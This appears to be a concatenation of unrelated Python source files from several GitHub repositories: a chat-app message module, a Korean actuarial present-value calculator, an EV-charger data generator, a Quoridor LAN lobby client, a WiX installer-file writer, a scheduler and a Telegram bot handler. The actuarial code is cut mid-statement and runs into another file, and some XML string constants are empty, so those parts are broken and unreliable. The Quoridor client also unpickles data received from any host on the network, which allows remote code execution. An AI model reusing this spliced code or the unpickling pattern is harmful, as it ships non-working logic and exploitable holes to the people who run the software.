def message_senddm(token, dm_id, message, **kw):\n    '''\n    Send a message from authorised_user to the DM specified by dm_id. Note: Each message should \n    have its own unique ID. I.E. No messages should share an ID with another message, even if \n    that other message is in a different channel or DM.\n\n    Arguments:\n        token (string) - JWT token encrypted with user's u_id and session_id.\n        dm_id (int) - Id of inputted dm.\n        message (string) - User's message to the specified channel.\n    \n    Exceptions:\n        InputError - Length of new message is over 1000 characters.\n        AccessError - When the authorised user is not a member of the DM they are trying to post to.\n    \n    Return Value:\n        Dictionary containing 'message_id'.\n    '''\n    dm_msg_id = message_send(token, dm_id, message)['message_id']\n\n    return {\n        'message_id': dm_msg_id\n    }\n\n
def message_share(token, og_message_id, message, channel_id, dm_id):\n    '''\n    Given a message_id, auth_user will share this message to a channel or dm. \n    If an optional message is given, it is added in addition to the originally shared message.\n\n    Arguments:\n        token (string) - JWT token encrypted with user's u_id and session_id.\n        og_message_id (int) - Id of the original message. \n        message (string) - Message is the optional message in addition to the shared message, and will be an empty string '' if no message is given\n        channel_id (int) - Channel Id that the message is being shared to, and is -1 if it is being sent to a DM.\n        dm_id (int) - Dm Id that the message is being shared to, and is -1 if it is being sent to a channel.\n    \n    Exceptions:\n        AccessError - When the authorised user has not joined the channel or DM they are trying to share the message to.\n    \n    Returns:\n        Dictionary containing 'shared_message_id'.\n    '''\n    data = get_data()\n\n    check_token(token)\n\n    token_structure = jwt.decode(token, SECRET, algorithms=['HS256'])\n    u_id = token_structure['u_id']\n\n    # First fetch the actual og message from og_msg_id.\n    og_channel_id, og_msg_index = search_message_id(og_message_id)\n    og_channel_index = get_channel_index(og_channel_id)\n\n    # Get a copy of the message.\n    og_message = data['channels'][og_channel_index]['messages'][og_msg_index]['message']\n\n    # Shared message combines the og_message and an optional message.\n    shared_msg = og_message + \", \" + message\n\n    # Sending to dm.\n    if channel_id == -1:\n        if not member_check(u_id, dm_id, data['channels']):\n            raise AccessError(description=\"User is not a member of the dm!\")\n        shared_message_id = message_senddm(token, dm_id, shared_msg)['message_id']\n\n    # Sending to channel\n    if dm_id == -1:\n        if not member_check(u_id, channel_id, data['channels']):\n            raise AccessError(description=\"User is not a member of the channel!\")\n        shared_message_id = message_send(token, channel_id, shared_msg)['message_id']\n\n    return {\n        'shared_message_id': shared_message_id,\n    }\n\n
def message_sendlater(token, channel_id, message, time_sent, **kw):\n    '''\n    This function allows users to send the message only after a specified time\n    Arguments:\n        token(string)\n        channel_id(int)\n        message(string)\n        time_sent(timestamp) - the specific time that the message will be sent\n    Returns:\n        message_id(id)\n    '''\n    #Inputerror: channel ID is not a valid channel\n    check_channel_id(channel_id)\n    #Inputerror: Message is more than 1000 characters\n    if len(message) > 1000:\n        raise InputError(description=\"Message is more than 1000 characters\")\n    #Inputerror: Time sent is a time in the past\n    # timestamp_now = datetime.now().replace(tzinfo=timezone.utc).timestamp()\n    timestamp_now = datetime.now().timestamp()\n    # print(f\"time_sent = {time_sent}\")\n    # print(f\"timestamp_now = {timestamp_now}\")\n    if time_sent < timestamp_now:\n        raise InputError(description=\"Time sent is a time in the past\")\n    \n    #AccessError: when the authorised user has not joined the channel they are trying to post to\n    data = get_data()\n    check_is_member(data['users'][check_token(token)]['u_id'], data['channels'][check_channel_id(channel_id)]['all_members'])\n\n    #send the message after time_sent has passed\n    # print()\n    time_count = time_sent - timestamp_now\n    # t = threading.Timer(time_count, message_send, [token, channel_id, message])\n    # .start()\n    time.sleep(time_count)\n    message_id = message_send(token, channel_id, message)['message_id']\n    # message_id = message_id_queue.pop()\n    return {\n        'message_id': message_id\n    }\n\n
def message_sendlaterdm(token, dm_id, message, time_sent, **kw):\n    # print(f'token = {token}, dm_id = {dm_id}, message = {message}')\n    return message_sendlater(token, dm_id, message, time_sent)\n\n
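# Note on the send-later pair above: time.sleep() blocks the calling worker for\n# the whole delay; the commented-out threading.Timer lines preserve the\n# non-blocking approach that was being experimented with.\n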
def message_pin(token, message_id):\n    '''\n    Given a message within a channel or DM, mark it as \"pinned\" to be given \n    special display treatment by the frontend.\n\n    Parameters:\n        token - Token of authorised user\n        message_id - message id for the message being pinned\n    \n    Exceptions:\n        InputError - message_id is not a valid message.\n        InputError - Message with ID message_id is already pinned.\n        AccessError - The authorised user is not a member of the channel or DM \n        that the message is within.\n        AccessError - The authorised user is not an owner of the channel or DM.\n\n    Returns:\n        None\n    '''\n    data = get_data()\n    user_index = check_token(token)\n\n    message, channel = message_id_exists(message_id)\n    if message == None:\n        raise InputError\n\n    if message['is_pinned'] == True:\n        raise InputError\n\n    if user_is_member(data['users'][user_index]['u_id'], channel) == False:\n        raise AccessError\n    \n    if user_is_owner_uid(data['users'][user_index]['u_id'], channel['channel_id']) == False:\n        raise AccessError\n\n    for ch in data['channels']:\n        if ch['channel_id'] == channel['channel_id']:\n            for msg in ch['messages']:\n                if msg['message_id'] == message['message_id']:\n                    msg['is_pinned'] = True\n\n    write_data(data)\n    return {}\n\n
def message_unpin(token, message_id):\n    '''\n    Given a message within a channel or DM, remove its \"pinned\" mark.\n    \n    Parameters:\n        token - Token of authorised user\n        message_id - Message id for the message being unpinned\n    \n    Exceptions:\n        InputError - message_id is not a valid message.\n        InputError - Message with ID message_id is already unpinned.\n        AccessError - The authorised user is not a member of the channel or DM \n        that the message is within.\n        AccessError - The authorised user is not an owner of the channel or DM.\n\n    Returns:\n        None\n    '''\n    data = get_data()\n    user_index = check_token(token)\n\n    message, channel = message_id_exists(message_id)\n    if message == None:\n        raise InputError\n\n    if message['is_pinned'] == False:\n        raise InputError\n\n    if user_is_member(data['users'][user_index]['u_id'], channel) == False:\n        raise AccessError\n    \n    if user_is_owner_uid(data['users'][user_index]['u_id'], channel['channel_id']) == False:\n        raise AccessError\n\n    for ch in data['channels']:\n        if ch['channel_id'] == channel['channel_id']:\n            for msg in ch['messages']:\n                if msg['message_id'] == message['message_id']:\n                    msg['is_pinned'] = False\n\n    write_data(data)\n    return {}\n\n\n
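# Reacts are stored on each message as a list with a single entry for react_id 1\n# (the shape appended in message_send above):\n#   {'react_id': 1, 'u_ids': [], 'is_this_user_reacted': False}\n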
def message_react(token, message_id, react_id):\n    '''\n    Given a message within a channel or DM the authorised user is part of, \n    add a \"react\" to that particular message.\n\n    Parameters:\n        token - Token for authorised user\n        message_id - Message id of message being reacted\n        react_id - Id for the specific react type\n    \n    Exceptions:\n        InputError - message_id is not a valid message within a channel or \n        DM that the authorised user has joined.\n        InputError - react_id is not a valid React ID. The only valid react \n        ID the frontend has is 1.\n        InputError - Message with ID message_id already contains an active \n        React with ID react_id from the authorised user.\n        AccessError - The authorised user is not a member of the channel or \n        DM that the message is within.\n    \n    Returns:\n        None\n    '''\n    data = get_data()\n    user_index = check_token(token)\n    \n    message, channel = message_id_exists(message_id)\n    if message == None:\n        raise InputError\n    \n    if react_id != 1:\n        raise InputError\n\n    if already_reacted(react_id, message) == True:\n        raise InputError\n    \n    if user_is_member(data['users'][user_index]['u_id'], channel) == False:\n        raise AccessError\n\n    for ch in data['channels']:\n        if ch['channel_id'] == channel['channel_id']:\n            for msg in ch['messages']:\n                if msg['message_id'] == message['message_id']:\n                    edit_react(msg, react_id, data['users'][user_index]['u_id'], 'append')\n\n    write_data(data)\n    return {}\n\n\n
def message_unreact(token, message_id, react_id):\n    '''\n    Given a message within a channel or DM the authorised user is part of, \n    remove a \"react\" from that particular message\n    \n    Parameters:\n        token - Token for authorised user\n        message_id - Message id of message being unreacted\n        react_id - Id for the specific react type\n    \n    Exceptions:\n        InputError - message_id is not a valid message within a channel or \n        DM that the authorised user has joined.\n        InputError - react_id is not a valid React ID. The only valid react \n        ID the frontend has is 1.\n        InputError - Message with ID message_id does not contain an active \n        React with ID react_id from the authorised user.\n        AccessError - The authorised user is not a member of the channel or \n        DM that the message is within.\n    \n    Returns:\n        None\n    '''\n    data = get_data()\n    user_index = check_token(token)\n    \n    message, channel = message_id_exists(message_id)\n    if message == None:\n        raise InputError\n\n    if react_id != 1:\n        raise InputError\n\n    if already_reacted(react_id, message) == False:\n        raise InputError\n    \n    if user_is_member(data['users'][user_index]['u_id'], channel) == False:\n        raise AccessError\n\n    for ch in data['channels']:\n        if ch['channel_id'] == channel['channel_id']:\n            for msg in ch['messages']:\n                if msg['message_id'] == message['message_id']:\n                    edit_react(msg, react_id, data['users'][user_index]['u_id'], 'remove')\n\n    write_data(data)\n    return {}\n\n","repo_name":"AlanFengyuWang/unsw_dream_project","sub_path":"project-backend/src/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":18153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42679255719","text":"import numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\n
class MyPV:\n    def __init__(self, excel_file : str = './INFO.xlsx', fillNa = 0):\n        # Read the Excel workbook\n        sht_rate = pd.read_excel(excel_file, sheet_name=\"위험률\", header=2)\n        sht_code = pd.read_excel(excel_file, sheet_name=\"코드\", header=2)\n        sht_comb = pd.read_excel(excel_file, sheet_name=\"결합위험률\", header=2)\n        sht_G = pd.read_excel(excel_file, sheet_name=\"영업보험료\")\n        sht_V = pd.read_excel(excel_file, sheet_name=\"준비금\")\n        \n        # Preprocessing\n        self.fillNa = 0 \n        self.sht_rate = sht_rate[['RiskKey', 'RiskCode', 'PassYear', 'x', 'Male', 'Female']].fillna(self.fillNa)\n        self.sht_code = sht_code[['RiskKind','KEY', 'BenefitNum', 'ExitCode', 'NonCov',\\\n                                  'BenefitCode', 'DefryRate', 'ReducRate', 'ReducPeriod', \\\n                                  'GrantCode', 'InvalidPeriod']].fillna(self.fillNa) \n
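        # The combined-risk sheet keys together up to eight component rates\n        # (RiskKey(1)..RiskKey(8)) with matching deferral periods (Period(1)..Period(8));\n        # getCombQx below either sums them (Operation 1) or combines survival\n        # probabilities multiplicatively (Operation 2).\n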
        self.sht_comb = sht_comb[['CombRiskKey', 'Operation', 'NumRiskKey'] \\\n                                 + [f\"RiskKey({i})\" for i in range(1, 8+1)] + [f\"Period({i})\" for i in range(1, 8+1)]].fillna(self.fillNa)\n        self.sht_G = sht_G\n        self.sht_V = sht_V\n\n        # Declared (crediting) interest rate\n        self.i = 0.0225\n        self.v = 1/(1+self.i)\n\n        # Number of insured lives at contract inception\n        self.l0 = 100000\n\n\n\n
    # Set the instance-wide arguments\n    def setArgs(self, KEY : str, sex : int, x : int,\\\n                n : int, m : int, mPrime : int, AMT : int, re : int, passYear : int = None): \n        \"\"\"\n        KEY : coverage (rider) key\n        re : renewal flag ---> 1 : initial contract / 2 : renewal contract\n        mPrime : premium payment frequency\n        passYear : elapsed policy years\n        \"\"\"\n        assert m<=n\n        assert sex in [1, 2]\n        assert x+n<120 \n        \n        self.KEY = KEY\n        self.sex = sex\n        self.x = x\n        self.n = n\n        self.m = m\n        self.mPrime = mPrime\n        self.AMT = AMT\n        self.passYear = 0 if passYear==None else passYear\n\n        # Expense loading setup\n        self.re = re\n        if self.re == 1:\n            alpha = 0.3\n        else:\n            if n == 1:\n                alpha = 0.07\n            elif n==2:\n                alpha = 0.14\n            else:\n                alpha = 0.21\n        self.alpha = alpha\n        self.beta = 0.19\n        self.beta5 = 0.02\n        self.ce = 0.038 # loss adjustment expense\n\n        # Limiting age of the mortality table\n        self.w = 108 if self.sex == 1 else 110 \n        # projection horizon (0, 1, 2, ... , n ---> n+1 steps)\n        self.proj = self.n+1\n\n
    def getQx(self, riskKey : str, sex : int = None, start : int = None) -> np.array:\n        if sex == None:\n            sex = self.sex\n        if start == None:\n            start = self.x\n        df = self.sht_rate.loc[self.sht_rate['RiskKey'] == riskKey].copy(deep=True)\n        if sex==1:\n            df = df[['x', 'Male']]\n        else:\n            df = df[['x', 'Female']]\n        qx = np.zeros(120)\n        for row in df.values: \n            age, rate = row\n            qx[int(age)] = rate\n        return qx[start:]\n\n
    # Build a combined risk rate from its component rates\n    def getCombQx(self, combRiskKey : str):\n        df = self.sht_comb.loc[self.sht_comb['CombRiskKey'] == combRiskKey].copy(deep=True)\n        row = df.values[0]\n        combRiskKey, operation, numRiskKey = row[:3]\n        riskKeys = row[3:3+int(numRiskKey)]\n        periods = row[11:11+int(numRiskKey)] \n        if operation == 1:\n            qx = np.zeros(120-self.x) \n            for rKey, period in zip(riskKeys, periods):\n                if rKey[0] == \"C\":\n                    qx_i = self.getCombQx(rKey)\n                else:\n                    qx_i = self.getQx(rKey, sex = self.sex, start=self.x) \n                qx_i[0] *= (1-period/12) \n                qx += qx_i\n        elif operation == 2:\n            qx = np.ones(120-self.x) \n            for rKey, period in zip(riskKeys, periods):\n                if rKey[0] == \"C\":\n                    qx_i = self.getCombQx(rKey)\n                else:\n                    qx_i = self.getQx(rKey, sex = self.sex, start=self.x) \n                qx_i[0] *= (1-period/12)\n                qx *= 1-qx_i\n            qx = 1-qx\n        else:\n            raise ValueError(\"결합위험률 시트 operation 입력 오류\") \n        return qx\n\n
    def getMatrixQx(self, riskKey : str)->np.array:\n        firstJoin = self.x - self.passYear # age at first issue = current entry age - elapsed years\n        df = self.sht_rate.loc[(self.sht_rate['x'] == firstJoin) & \\\n                               (self.sht_rate['RiskKey'] == riskKey)].copy(deep = True)\n        if self.sex == 1:df = df[['PassYear', 'Male']]\n        else:df = df[['PassYear', 'Female']]\n        qx = np.zeros(120)\n        for row in df.values:\n            age, rate = row\n            qx[int(age)] = rate\n        return qx \n    \n
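    # Illustrative call (the KEY value is a placeholder, not a key from the real\n    # INFO.xlsx workbook):\n    #   pv = MyPV('./INFO.xlsx')\n    #   pv.setArgs(KEY='A001', sex=1, x=40, n=20, m=20, mPrime=12, AMT=10000000, re=1)\n    #   pv.Calc()\n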
    def Calc(self, returnSample : bool = False):\n        df = self.sht_code.copy(deep=True)\n        df = df.loc[df['KEY'] == self.KEY]\n        # Initialize\n        Dx, DxPrime, Nx, NxPrime, tVx, tWx, SUMx = [0.]*(self.proj), [0.]*(self.proj), [0.]*(self.proj),\\\n                                                   [0.]*(self.proj), [], [], [0.]*(self.proj)\n        sample_dict = {}\n        for row in df.values:\n            lx = []\n            # unpack\n            riskKind, _ , benefitNum, exitCode, nonCov, benefitCode, defryRate, reducRate, reducPeriod, grantCode, invalidPeriod = row \n            # float ---> int\n            nonCov = int(nonCov) \n            reducPeriod = int(reducPeriod)\n            invalidPeriod = int(invalidPeriod)\n            ##------------ risk-rate setup ------------## \n            # Case: combined risk rates\n            if riskKind == \"C\":\n                if benefitNum != 99:\n                    # lapse/exit rate\n                    if exitCode == self.fillNa:\n                        q_exit = np.zeros(self.proj)\n                    else:\n                        q_exit = self.getCombQx(combRiskKey=exitCode) \n                    # benefit incidence rate \n                    if benefitCode == self.fillNa:\n                        q_benefit = np.zeros(self.proj)\n                    else:\n                        q_benefit = self.getCombQx(combRiskKey=benefitCode) \n                else:\n                    # premium waiver rate \n                    if grantCode == self.fillNa:\n                        q_grant = np.zeros(self.proj)\n                    else:\n                        q_grant = self.getCombQx(combRiskKey=grantCode) \n\n
            # Case: select (matrix) risk rates\n            elif riskKind == \"M\":\n                if benefitNum != 99:\n                    # lapse/exit rate\n                    if exitCode == self.fillNa:\n                        q_exit = np.zeros(self.proj)\n                    else:\n                        q_exit = self.getMatrixQx(riskKey=exitCode) \n                    # benefit incidence rate \n                    if benefitCode == self.fillNa:\n                        q_benefit = np.zeros(self.proj)\n                    else:\n                        q_benefit = self.getMatrixQx(riskKey=benefitCode) \n                else:\n                    # premium waiver rate \n                    if grantCode == self.fillNa:\n                        q_grant = np.zeros(self.proj)\n                    else:\n                        q_grant = self.getMatrixQx(riskKey=grantCode) \n            \n            # Otherwise: plain aggregate rates\n            else:\n                if benefitNum != 99:\n                    # lapse/exit rate\n                    if exitCode == self.fillNa:\n                        q_exit = np.zeros(self.proj)\n                    else:\n                        q_exit = self.getQx(riskKey = exitCode) \n                    # benefit incidence rate \n                    if benefitCode == self.fillNa:\n                        q_benefit = np.zeros(self.proj)\n                    else:\n                        q_benefit = self.getQx(riskKey=benefitCode) \n                else:\n                    # premium waiver rate \n                    if grantCode == self.fillNa:\n                        q_grant = np.zeros(self.proj)\n                    else:\n                        q_grant = self.getQx(riskKey=grantCode) \n            \n
            ## ------------ lx ------------ ##\n            if benefitNum != 99:\n                # in-force lives \n                lx = [self.l0] \n                for t in range(self.proj-1):\n                    q = q_exit[t]\n                    if t==0:\n                        q*=(1-nonCov/12)\n                    l_next = lx[t]*(1-q)\n                    lx.append(l_next) \n            else:\n                # premium-paying lives\n                lx = [self.l0]\n                for t in range(self.proj-1):\n                    q = q_grant[t]\n                    if t==0:\n                        q*=(1-invalidPeriod/12)\n                    l_next = lx[t]*(1-q)\n                    lx.append(l_next) \n\n
            ## ------------ commutation functions ------------ ##\n            # Dx, Nx\n            if benefitNum == 0:\n                Dx = [lx[t]*self.v**t for t in range(self.proj)]\n                Nx = [sum(Dx[t:]) for t in range(self.proj)]\n            # D'x, N'x\n            elif benefitNum == 99:\n                DxPrime = [lx[t]*self.v**t for t in range(self.proj)]\n                NxPrime = [sum(DxPrime[t:]) for t in range(self.proj)]\n            # dx, Cx, Mx, SUMx\n            else:\n                dx = [q_benefit[t]*lx[t] for t in range(self.proj)]\n                Cx = [dx[t]*self.v**(t+0.5) for t in range(self.proj)]\n                Mx = [sum(Cx[t:]) for t in range(self.proj)]\n                for t in range(self.proj):\n                    if t 0.875:\n            charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[0] + \",0,0,0\\n\")\n        elif dice > 0.75:\n            charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[1] + \",0,0,0\\n\")\n        elif dice > 0.625:\n            charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[2] + \",0,0,0\\n\")\n        elif dice > 0.5:\n            charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[3] + \",0,0,0\\n\")\n        elif dice > 0.375:\n            charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[4] + \",0,0,0\\n\")\n        elif dice > 0.25:\n            charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[5] + \",0,0,0\\n\")\n        elif dice > 0.125:\n            charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[6] + \",0,0,0\\n\")\n        else:\n            charger_connectors_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + charger_connector_uuid_arr[7] + \",0,0,0\\n\")\n\nwith open(CHARGER_CONNECTOR_OUT, 'w', encoding='UTF-8') as file:\n    rows = [file.write(line) for line in charger_connectors_rows]\n\n#####\n\ndt = datetime.datetime(2023, 4, 
1)\n\ncharger_rate_historic_rows.append(\"id,id_charger,rate,timestamp\\n\")\n\nfor i in range(91*24):\n    dt_string = dt.isoformat(sep='T', timespec='auto')\n    for count, row in enumerate(charger_rows_2d):\n        if count == 0:\n            continue\n        else:\n            random_rate = str(round(random.uniform(0.1, 0.5), 2))\n            charger_rate_historic_rows.append(str(uuid.uuid4()) + \",\" + row[0] + \",\" + random_rate + \",\" + dt_string + \"\\n\")\n\n    dt = dt + datetime.timedelta(hours=1)\n\nwith open(CHARGER_RATE_HISTORIC_PUT, 'w', encoding='UTF-8') as file:\n    rows = [file.write(line) for line in charger_rate_historic_rows]\n","repo_name":"maximus-lee-678/team_15_flask_react","sub_path":"datasets/uuider.py","file_name":"uuider.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27692894653","text":"import pickle\nimport socket\nimport time\nfrom typing import Any\nfrom graphical.widgets.menu import Menu\n\nfrom multi.multiplayerClient import MultiplayerGame\n\n\n
class SearchServer():\n    \"\"\"This class is used to create the sockets for discovery and the server\"\"\"\n\n    def __init__(self) -> None:\n        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.discoSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        self.discoSock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n        self.DISCOVERY_MSG = b\"SERVER_DISCOVERY_REQUEST\"\n\n    def discover(self) -> list[dict[str, Any]]:\n        \"\"\"Send a discovery message on broadcast to find potential hosts on the local network;\n        returns the list of lobby info dicts received.\"\"\"\n        self.discoSock.sendto(self.DISCOVERY_MSG, ('', 5555))\n        # Wait at most 1 second for each response (the loop below polls for ~3 seconds)\n        self.discoSock.settimeout(1.0)\n        serverList = list[dict[str, Any]]()\n\n        try:\n            start_time = time.time()\n            while time.time() - start_time < 3:\n\n                data, _ = self.discoSock.recvfrom(1024)\n                try:\n                    server_info = pickle.loads(data)\n                    serverList.append(server_info)\n                    print(\"Server info:\", server_info)\n                except pickle.UnpicklingError:\n                    print(\"Received a non-Python object.\")\n\n        except socket.timeout:\n            print('request timed out / no server found')\n        return list(serverList)\n\n
    def connect(self, ip: str, port: int) -> list[int]:\n        \"\"\"Connects the socket.\"\"\"\n        try:\n            self.connection.connect((ip, port))\n            print(\"Connection active\")\n            serverMessage = self.connection.recv(4096)\n            startVars = pickle.loads(serverMessage)\n            print(\"startVars : \", startVars)\n            return startVars\n        except socket.error as e:\n            print(\"Error on connection\")\n            raise SystemExit from e\n\n
    def multiLaunch(self, fullScreen, startVars: list[int], clientListLen: int, host: bool, currentMenu: object) -> \\\n            tuple[bool,\n                  int]:\n        try:\n            serverMessage = self.connection.recv(4096)\n            print(\"received:\", serverMessage)\n            unpickled_message = pickle.loads(serverMessage)\n            print(\"unpickled : \", unpickled_message)\n            if unpickled_message[0] != \"lenConnected\":\n                print(\"starting game\", startVars)\n                self.connection.setblocking(True)\n                self.createGame(self.connection, fullScreen, startVars, host, currentMenu)\n\n                return True, clientListLen\n            else:\n                print(\"connected players = \", unpickled_message[1])\n                return False, int(unpickled_message[1])\n\n        except Exception:\n            return False, clientListLen\n\n    def roomState(self):\n        try:\n            serverMessage = self.connection.recv(4096)\n            return pickle.loads(serverMessage)\n\n        except Exception:\n            return\n\n    @staticmethod\n    def createGame(connection: socket.socket, fullScreen, 
startVars: list[Any], host: bool, currentMenu: object):\n \"\"\" creates an instance of the class: MultiplayerGame passing the user's choices as parameters \"\"\"\n print(\"Game infos:\", startVars)\n num = int(startVars[0])\n width = startVars[1]\n nbBarrier = startVars[2]\n nbPlayer = startVars[3]\n nbBots = startVars[4]\n startingPlayer = startVars[5]\n board = MultiplayerGame(connection, fullScreen, width, nbBarrier,\n nbPlayer, host, startingPlayer, nbBots, num)\n Menu.newMenu(currentMenu, board)\n\n @staticmethod\n def getSelfHost() -> str:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # Doesn't need to be reachable, it's used to make the OS determine the preferred outgoing IP interface\n s.connect(('10.255.255.255', 1))\n host = s.getsockname()[0]\n except Exception:\n host = '0.0.0.0' # Listen on all available interfaces\n finally:\n s.close()\n return host\n","repo_name":"Baptiste-Crepin/Quoridor","sub_path":"multi/discoveryServer.py","file_name":"discoveryServer.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32569867248","text":"# Created by Jiří Strouhal (2023).\n# Written in Python 3.10.10\n# Licensed under the MIT License. See the LICENSE in the project root folder. \n# Public repository: https://github.com/jiristrouhal/makewxs.\n# Use MznStrouhal@gmail.com to reach the author.\n\n\nimport os\nimport xml.etree.ElementTree as et\n\nWXS_SCHEMA_LINK = \"http://wixtoolset.org/schemas/v4/wxs\"\nSDK = \"Wixtoolset.Sdk/4.0.0\"\nDEFAULT_DOWNGRADE_MESSAGE = \"A newer version has already been installed!\"\n\n\nWXS_OPENER = ''\nWXS_CLOSING = ''\n\nSTANDARD_DIRECTORY_OPENING = \"\\t\"\nSTANDARD_DIRECTORY_CLOSING = \"\\t\"\n\n\ndef write_component_groups_ref_xml(target_path:str,refs:str,project_name:str)->None:\n with open(target_path+\"/\"+project_name+\"_group_refs.xml\",'w') as group_refs_xml: group_refs_xml.write(refs)\n\ndef write_component_wxs(target_path:str,components:str,project_name:str)->None:\n components = WXS_OPENER + '\\n\\n' + \"\" + components + \"\" + '\\n' + WXS_CLOSING\n with open(target_path+\"/\"+project_name+\"_components.wxs\",'w') as component_wxs: component_wxs.write(components)\n\ndef write_dir_wxs(target_path:str,folders:str,project_name:str)->None:\n folders = STANDARD_DIRECTORY_OPENING + folders + '\\n' + STANDARD_DIRECTORY_CLOSING\n folders = WXS_OPENER + '\\n\\n' + \"\\n\" + folders + \"\\n\" + '\\n\\n' + WXS_CLOSING\n with open(target_path+\"/\"+project_name+\"_dirs.wxs\",'w') as folder_wxs: \n folder_wxs.write(folders)\n\ndef write_base_wxs_if_missing(target_path:str,project_name:str)->None:\n file_path = os.path.join(target_path,project_name+\".wxs\")\n try: \n et.parse(file_path)\n except: \n wxs_root = et.Element(\"Wix\", attrib={\"xmlns\":WXS_SCHEMA_LINK})\n package = et.SubElement(wxs_root,\"Package\", attrib={\"Name\":project_name, \"Manufacturer\":\"\",\"Version\":\"M.m.p\",\"UpgradeCode\":\"\"})\n et.SubElement(package,\"MajorUpgrade\", attrib={\"DowngradeErrorMessage\":DEFAULT_DOWNGRADE_MESSAGE})\n main_feature = et.SubElement(package,\"Feature\",attrib={\"Id\":\"Main\"})\n et.SubElement(main_feature,\"ComponentGroupRef\")\n et.indent(wxs_root,space=\"\\t\")\n et.ElementTree(wxs_root).write(file_path,encoding=\"UTF-8\",xml_declaration=True)\n\n\ndef write_wixproj_if_missing(target_path:str,project_name:str)->None:\n file_path = os.path.join(target_path,project_name+\".wixproj\")\n try: \n et.parse(file_path)\n except: \n 
wxs_root = et.Element(\"Project\", attrib={\"Sdk\":SDK})\n et.indent(wxs_root,space=\"\\t\")\n et.ElementTree(wxs_root).write(file_path)\n\n","repo_name":"jiristrouhal/makewxs","sub_path":"src/write_wxs_files.py","file_name":"write_wxs_files.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4027269949","text":"import socket\nimport sys\nimport time\n\nfrom tqueue import TQueue\n\nclass Scheduler:\n def __init__(self):\n self.t_queue = TQueue() # waiting for a given time\n self.i_queue = [] # run as soon as possible\n self.alive = False\n\n def run(self):\n self.alive = True\n while (self.alive):\n # run all functions that can be run instantly\n if (len(self.i_queue) > 0):\n self.i_queue.pop(0)()\n # run all functions whose timeout has passed\n while (self.t_queue.get_closest_time() and\n self.t_queue.get_closest_time() < time.time()):\n self.t_queue.pop()()\n\n def call(self, func):\n self.i_queue.append(func)\n\n def set_timeout(self, func, timeout):\n self.t_queue.push(time.time() + timeout, func)\n\n def kill(self):\n self.alive = False\n\nS = Scheduler()\n\nif __name__ == \"__main__\":\n print (\"testing scheduler...\")\n start_time = time.time()\n a = []\n def print_hello():\n a.append(\"a\")\n if (start_time + 1 < time.time()):\n S.kill()\n S.set_timeout(print_hello, 0.1)\n S.set_timeout(print_hello, 0.1)\n S.run()\n assert(len(a) == 10)\n a = []\n def appendTo(a):\n a.append(\"a\")\n return len(a)\n\n def rep_append():\n if (appendTo(a) > 5):\n S.kill()\n S.call(rep_append)\n S.call(rep_append)\n S.run()\n assert(len(a) == 6)\n print (\"...passed\")\n","repo_name":"Alex-Padron/personal-projects","sub_path":"scheduler-python/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17814891694","text":"from aiogram import Router, F\nfrom aiogram.exceptions import TelegramBadRequest\nfrom aiogram.filters import StateFilter, or_f\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.types import CallbackQuery\nfrom fluentogram import TranslatorRunner\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom tg_bot.keyboards.groups import get_groups_keyboard\nfrom tg_bot.keyboards.pagination import get_back_keyboad\nfrom tg_bot.states.mailing import FSMMailing\nfrom tg_bot.utils.cache.cache_access import CacheAccess\nfrom tg_bot.utils.paginator import slice_dict, get_current_page_from_dict\nfrom tg_bot.utils.process_group import get_group_dict\nfrom tg_bot.utils.process_mailing import change_group\n\nrouter: Router = Router()\n\n@router.callback_query(F.data == 'group', StateFilter(FSMMailing.view_mailing_menu))\nasync def process_edit_group(callback: CallbackQuery, lexicon: TranslatorRunner, state: FSMContext,\n session: AsyncSession, cache: CacheAccess):\n group_dict = await get_group_dict(session, cache)\n result_dict, num_pages = slice_dict(group_dict, num_elements=6)\n await state.update_data(result_dict=result_dict, num_pages=num_pages, current_page=0)\n keyboard = await get_groups_keyboard(result_dict['0'])\n await callback.message.edit_text(text=lexicon.select.group(), reply_markup=keyboard)\n await state.set_state(FSMMailing.change_group)\n\n\n@router.callback_query(or_f(F.data == 'previous', F.data == 'next'), StateFilter(FSMMailing.change_group))\nasync def process_paginator_groups(callback: CallbackQuery, state: FSMContext, lexicon: 
TranslatorRunner):\n    is_next = True if callback.data == 'next' else False\n    posts_group: dict[str, str] = await get_current_page_from_dict(state, is_next)\n    keyboard = await get_groups_keyboard(posts_group)\n\n    try:\n        await callback.message.edit_text(text=lexicon.current.group(text=lexicon.select.group()), reply_markup=keyboard)\n    except TelegramBadRequest:\n        await callback.answer()\n\n\n
